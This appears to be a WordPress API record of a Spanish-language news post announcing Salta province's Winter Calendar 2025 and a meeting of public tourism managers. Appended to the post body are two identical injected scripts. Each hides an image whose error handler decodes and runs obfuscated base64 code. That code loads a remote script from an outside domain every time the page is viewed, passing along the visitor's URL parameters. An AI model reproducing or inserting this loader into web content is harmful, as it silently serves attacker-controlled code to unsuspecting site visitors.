{"id":5309,"date":"2025-07-04T09:56:08","date_gmt":"2025-07-04T12:56:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5309"},"modified":"2025-08-13T23:27:48","modified_gmt":"2025-08-14T02:27:48","slug":"salta-lanza-su-calendario-de-invierno-2025-y-convoca-al-2-encuentro-de-gestores-publicos-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5309","title":{"rendered":"Salta lanza su Calendario de Invierno 2025 y convoca al 2\u00b0 Encuentro de Gestores P\u00fablicos de Turismo"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes presentar\u00e1 el lunes 7 de julio el Calendario de Invierno 2025 con una gran diversidad de actividades que se desarrollar\u00e1n en toda la provincia. En el marco del evento, que se realizar\u00e1 a partir de las 10 hs. en la Usina Cultural, se llevar\u00e1 adelante el 2\u00ba Encuentro de Gestores P\u00fablicos de Turismo.<\/em><\/strong><\/p>\n\n\n\n<p>El lunes 7 de julio, a partir de las 10 hs., el Ministerio de Turismo y Deportes presentar\u00e1 el Calendario de Invierno 2025. La actividad tendr\u00e1 lugar en el Teatro de la Usina Cultural, sito en Espa\u00f1a esq. Juramento; y contar\u00e1 con la participaci\u00f3n de autoridades provinciales y municipales.<\/p>\n\n\n\n<p>Durante la jornada se dar\u00e1n a conocer las propuestas tur\u00edsticas, culturales y recreativas que ofrecer\u00e1 la provincia durante la temporada invernal, destacando experiencias pensadas para salte\u00f1os y visitantes en las &nbsp;siete regiones de la Provincia.<\/p>\n\n\n\n<p>En este mismo marco se llevar\u00e1 a cabo el 2\u00b0 Encuentro de Gestores P\u00fablicos de Turismo, un espacio de intercambio y formaci\u00f3n orientado a fortalecer la gesti\u00f3n local del turismo, promoviendo el trabajo articulado entre el Ministerio y los gobiernos municipales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes presentar\u00e1 el lunes 7 de julio el Calendario de Invierno 2025 con una gran diversidad de actividades que se desarrollar\u00e1n en toda la provincia. En el marco del evento, que se realizar\u00e1 a partir de las 10 hs. en la Usina Cultural, se llevar\u00e1 adelante el 2\u00ba Encuentro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5310,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-5309","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5309"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5309"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5309\/revisions"}],"predecessor-version":[{"id":6447,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5309\/revisions\/6447"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5310"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}